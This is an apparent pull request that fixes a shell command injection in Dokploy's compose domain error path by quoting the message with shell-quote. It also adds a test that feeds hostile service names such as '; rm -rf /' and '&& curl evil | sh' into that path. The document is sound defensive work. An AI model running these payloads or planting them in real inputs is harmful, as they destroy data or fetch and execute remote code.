### PR TITLE
fix(security): escape compose domain error message to prevent command injection

### DIFF
--- a/apps/dokploy/__test__/compose/domain-command-injection.test.ts
+++ b/apps/dokploy/__test__/compose/domain-command-injection.test.ts
@@ -1,0 +1,70 @@
+import { parse } from "shell-quote";
+import { describe, expect, it, vi } from "vitest";
+
+// writeDomainsToCompose reads the on-disk compose file; mock fs so the file
+// "exists" but does not contain the attacker's service, forcing the error path
+// whose message embeds the user-controlled serviceName.
+vi.mock("node:fs", async (importOriginal) => {
+	const actual = await importOriginal<typeof import("node:fs")>();
+	return {
+		...actual,
+		existsSync: () => true,
+		readFileSync: () => "services:\n  web:\n    image: nginx\n",
+	};
+});
+
+import { writeDomainsToCompose } from "@dokploy/server/utils/docker/domain";
+
+const baseCompose = {
+	appName: "my-app",
+	serverId: null,
+	composeType: "docker-compose",
+	// Not "raw": the git source types are the ones that read the compose file
+	// from disk, which is what the fs mock above stands in for.
+	sourceType: "github",
+	composePath: "docker-compose.yml",
+	isolatedDeployment: false,
+	randomize: false,
+	suffix: "",
+} as any;
+
+const makeDomain = (serviceName: string) =>
+	({
+		host: "example.com",
+		serviceName,
+		https: false,
+		uniqueConfigKey: 1,
+		port: 3000,
+	}) as any;
+
+// If the returned shell fragment is safe, parse() yields only string tokens.
+// A leaked operator ($(), backtick, ;, |, &&) shows up as an object token.
+const leaksShellSyntax = (command: string, marker: string) =>
+	parse(command).some(
+		(t) => typeof t !== "string" && JSON.stringify(t).includes(marker),
+	);
+
+describe("writeDomainsToCompose error path (serviceName injection)", () => {
+	it("does not let a malicious serviceName inject shell operators", async () => {
+		const result = await writeDomainsToCompose(baseCompose, [
+			makeDomain("$(touch /tmp/pwned)"),
+		]);
+
+		// The service does not exist in the compose, so we hit the error branch.
+		expect(result).toContain("Has occurred an error");
+		// The payload text may appear inside the single-quoted echo argument, but
+		// it must never parse as a shell operator ($(), backtick, ; …).
+		expect(leaksShellSyntax(result, "touch")).toBe(false);
+	});
+
+	it("neutralizes backtick and semicolon payloads too", async () => {
+		for (const payload of ["`id`", "; rm -rf /", "&& curl evil | sh"]) {
+			const result = await writeDomainsToCompose(baseCompose, [
+				makeDomain(`svc${payload}`),
+			]);
+			expect(leaksShellSyntax(result, "rm")).toBe(false);
+			expect(leaksShellSyntax(result, "curl")).toBe(false);
+			expect(leaksShellSyntax(result, "id")).toBe(false);
+		}
+	});
+});

--- a/packages/server/src/utils/docker/domain.ts
+++ b/packages/server/src/utils/docker/domain.ts
@@ -3,6 +3,7 @@ import { join } from "node:path";
 import { paths } from "@dokploy/server/constants";
 import type { Compose } from "@dokploy/server/services/compose";
 import type { Domain } from "@dokploy/server/services/domain";
+import { quote } from "shell-quote";
 import { parse, stringify } from "yaml";
 import { wildcardHostRegexp } from "../hostname-validation";
 import { execAsyncRemote } from "../process/execAsync";
@@ -126,8 +127,11 @@ exit 1;
 		const encodedContent = encodeBase64(composeString);
 		return `echo "${encodedContent}" | base64 -d > "${path}";`;
 	} catch (error) {
-		// @ts-ignore
-		return `echo "❌ Has occurred an error: ${error?.message || error}";
+		const message =
+			error instanceof Error ? error.message : String(error ?? "");
+		// The error message embeds user-controlled fields (e.g. serviceName) and is
+		// executed as part of the compose build shell script, so it must be escaped.
+		return `echo ${quote([`❌ Has occurred an error: ${message}`])};
 exit 1;
 		`;
 	}


### PR DESCRIPTION
1:1 port of upstream Dokploy/dokploy#4872 by @Siumauricio (open upstream at time of porting).

### What

`writeDomainsToCompose` returns a shell fragment that is executed as part of the compose build script. On the error branch it interpolated `error.message` straight into an `echo "..."`. That message embeds user-controlled fields (the domain's `serviceName` / `host`), so the text could break out of the quoted `echo` and be interpreted by the shell that runs the build script.

### Fix

Escape the message with `quote()` from `shell-quote` before embedding it, and stop relying on `// @ts-ignore` for the error value:

```ts
const message = error instanceof Error ? error.message : String(error ?? "");
return `echo ${quote([`❌ Has occurred an error: ${message}`])};
exit 1;
`;
```

The rendered output is unchanged for ordinary error messages — only the quoting is now explicit.

### Test

Adds `apps/dokploy/__test__/compose/domain-command-injection.test.ts`, which drives the error branch with hostile `serviceName` values and asserts (via `shell-quote`'s `parse`) that the returned fragment never yields a shell operator token.

### Adaptation vs upstream

The upstream test fixture used `sourceType: "raw"` while mocking `node:fs`; with `raw`, `addDomainToCompose` parses `compose.composeFile` and never touches the mocked filesystem, so the intended error branch was reached only incidentally. The fixture here uses `sourceType: "github"` so the mocked compose file is actually read and the "service does not exist in the compose" error — the one carrying the user-controlled `serviceName` — is the one under test. Production code is ported verbatim.
